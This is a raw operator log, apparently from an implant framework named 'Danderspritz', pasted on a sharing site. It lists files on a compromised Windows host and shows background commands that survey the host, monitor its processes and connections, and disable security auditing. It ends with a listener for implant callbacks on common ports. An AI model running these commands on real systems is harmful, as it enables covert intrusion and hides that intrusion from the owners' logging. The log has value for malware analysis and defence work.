- | 2017-04-28 16:33:01 | 72 | C:\Windows\System32\LogFiles\WMI\RtBackup | EtwRTEventLog-System.etl |
- | 2017-04-28 16:35:23 | 0 | C:\Windows\System32\LogFiles\WMI\RtBackup | EtwRTMsMpPsSession7.etl |
- | 2017-04-28 16:33:16 | 72 | C:\Windows\System32\LogFiles\WMI\RtBackup | EtwRTUBPM.etl |
- | 2017-04-28 16:40:19 | <DIR> | C:\Windows\System32\Tasks\Microsoft | Windows Defender |
- | 2017-04-28 16:40:19 | 3856 | C:\Windows\System32\Tasks\Microsoft\Windows Defender | MP Scheduled Scan |
- | 2017-04-28 16:37:20 | <DIR> | C:\Windows\System32\wbem | Performance |
- | 2017-04-28 16:33:17 | <DIR> | C:\Windows\System32\wbem | Repository |
- | 2017-04-28 16:37:15 | 3444 | C:\Windows\System32\wbem\Performance | WmiApRpl.h |
- | 2017-04-28 16:37:20 | 28590 | C:\Windows\System32\wbem\Performance | WmiApRpl.ini |
- | 2017-04-28 16:45:46 | 4349952 | C:\Windows\System32\wbem\Repository | INDEX.BTR |
- | 2017-04-28 16:38:16 | 50152 | C:\Windows\System32\wbem\Repository | MAPPING2.MAP |
- | 2017-04-28 16:45:46 | 50152 | C:\Windows\System32\wbem\Repository | MAPPING3.MAP |
- | 2017-04-28 16:45:46 | 15425536 | C:\Windows\System32\wbem\Repository | OBJECTS.DATA |
- | 2017-04-28 16:34:55 | 37880 | C:\Windows\System32\wdi | BootPerformanceDiagnostics_SystemData.bin |
- | 2017-04-28 16:34:54 | <DIR> | C:\Windows\System32\wdi | {86432a0b-3c7d-4ddf-a89c-172faa90485d} |
- | 2017-04-28 16:34:53 | 4980736 | C:\Windows\System32\wdi\LogFiles | BootCKCL.etl |
- | 2017-04-28 16:32:47 | 212992 | C:\Windows\System32\wdi\LogFiles | WdiContextLog.etl.001 |
- | 2017-04-28 16:34:55 | 5342 | C:\Windows\System32\wdi\{86432a0b-3c7d-4ddf-a89c-172faa90485d} | S-1-5-21-3463664321-2923530833-3546627382-1000_UserData.bin |
- | 2017-04-28 16:34:54 | <DIR> | C:\Windows\System32\wdi\{86432a0b-3c7d-4ddf-a89c-172faa90485d} | {577acaf2-2396-41ba-ba84-dfccf3d45721} |
- | 2017-04-28 16:32:47 | 212992 | C:\Windows\System32\wdi\{86432a0b-3c7d-4ddf-a89c-172faa90485d}\{577acaf2-2396-41ba-ba84-dfccf3d45721} | snapshot.etl |
- | 2017-04-28 16:34:07 | 0 | C:\Windows\System32\wfp | wfpdiag.etl |
- | 2017-04-28 16:33:04 | 1118208 | C:\Windows\System32\winevt\Logs | Application.evtx |
- | 2017-04-28 16:33:06 | 69632 | C:\Windows\System32\winevt\Logs | Microsoft-Windows-BranchCacheSMB%%%%4Operational.evtx |
- | 2017-04-28 16:33:06 | 69632 | C:\Windows\System32\winevt\Logs | Microsoft-Windows-Dhcpv6-Client%%%%4Admin.evtx |
- | 2017-04-28 16:34:57 | 1052672 | C:\Windows\System32\winevt\Logs | Microsoft-Windows-Diagnosis-DPS%%%%4Operational.evtx |
- | 2017-04-28 16:34:57 | 1052672 | C:\Windows\System32\winevt\Logs | Microsoft-Windows-Diagnostics-Performance%%%%4Operational.evtx |
- | 2017-04-28 16:33:06 | 1118208 | C:\Windows\System32\winevt\Logs | Microsoft-Windows-GroupPolicy%%%%4Operational.evtx |
- | 2017-04-28 16:33:40 | 69632 | C:\Windows\System32\winevt\Logs | Microsoft-Windows-HomeGroup Provider Service%%%%4Operational.evtx |
- | 2017-04-28 16:33:04 | 1052672 | C:\Windows\System32\winevt\Logs | Microsoft-Windows-Kernel-WHEA%%%%4Operational.evtx |
- | 2017-04-28 16:36:36 | 1052672 | C:\Windows\System32\winevt\Logs | Microsoft-Windows-Known Folders API Service.evtx |
- | 2017-04-28 16:33:19 | 1052672 | C:\Windows\System32\winevt\Logs | Microsoft-Windows-NetworkProfile%%%%4Operational.evtx |
- | 2017-04-28 16:33:05 | 69632 | C:\Windows\System32\winevt\Logs | Microsoft-Windows-OfflineFiles%%%%4Operational.evtx |
- | 2017-04-28 16:42:10 | 69632 | C:\Windows\System32\winevt\Logs | Microsoft-Windows-ReliabilityAnalysisComponent%%%%4Operational.evtx |
- | 2017-04-28 16:33:22 | 69632 | C:\Windows\System32\winevt\Logs | Microsoft-Windows-Resource-Exhaustion-Detector%%%%4Operational.evtx |
- | 2017-04-28 16:33:22 | 69632 | C:\Windows\System32\winevt\Logs | Microsoft-Windows-TerminalServices-LocalSessionManager%%%%4Operational.evtx |
- | 2017-04-28 16:33:18 | 69632 | C:\Windows\System32\winevt\Logs | Microsoft-Windows-TerminalServices-RemoteConnectionManager%%%%4Operational.evtx |
- | 2017-04-28 16:33:19 | 1118208 | C:\Windows\System32\winevt\Logs | Microsoft-Windows-User Profile Service%%%%4Operational.evtx |
- | 2017-04-28 16:35:21 | 69632 | C:\Windows\System32\winevt\Logs | Microsoft-Windows-Windows Defender%%%%4WHC.evtx |
- | 2017-04-28 16:33:19 | 1052672 | C:\Windows\System32\winevt\Logs | Microsoft-Windows-Windows Firewall With Advanced Security%%%%4Firewall.evtx |
- | 2017-04-28 16:40:10 | 69632 | C:\Windows\System32\winevt\Logs | Microsoft-Windows-WindowsBackup%%%%4ActionCenter.evtx |
- | 2017-04-28 16:36:13 | 1052672 | C:\Windows\System32\winevt\Logs | Microsoft-Windows-WindowsUpdateClient%%%%4Operational.evtx |
- | 2017-04-28 16:33:04 | 4263936 | C:\Windows\System32\winevt\Logs | Security.evtx |
- | 2017-04-28 16:33:02 | 3215360 | C:\Windows\System32\winevt\Logs | System.evtx |
- | 2017-04-28 16:33:06 | 6 | C:\Windows\Tasks | SA.DAT |
- Command completed successfully
- - [2017-04-28 09:52:59 z0.0.0.11] Commands currently running in the background:
- | ID | Target | Full Command | Sent | Received |
- +-----+-----------+--------------------------------------------------------------------------------------------------------+------+----------+
- | 145 | z0.0.0.11 | keepalive -delay 1m | 109 | 0 |
- | 214 | z0.0.0.11 | script Connected/Connected.dss | 0 | 0 |
- | 215 | z0.0.0.11 | python Connected/Connected.py -project Ops | 0 | 0 |
- | 230 | z0.0.0.11 | python survey.py -args " -run " | 0 | 0 |
- | 234 | z0.0.0.11 | background python monitorwrap.py -args "-g -t OPS_PROCESS_MONITOR_TAG -i 5 -s "processes -monitor " " | 0 | 0 |
- | 235 | z0.0.0.11 | background log=monitor guiflag=monitor processes -monitor | 236 | 966 |
- | 311 | z0.0.0.11 | stopaliasing dst=z0.0.0.11 audit -disable security | 152 | 14 |
- | 323 | z0.0.0.11 | netconnections -monitor | 175 | 439 |
- | 327 | z0.0.0.11 | arp -delay 10s -monitor | 169 | 382 |
- Command completed successfully
- Command completed successfully
- Command completed successfully
- Command completed successfully
- [16:52:59] Backgrounded 'pc_listen -key "Default" -payload "Danderspritz" -run "memlib" -tcp "443 80 53 1509" ' Id: 134
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement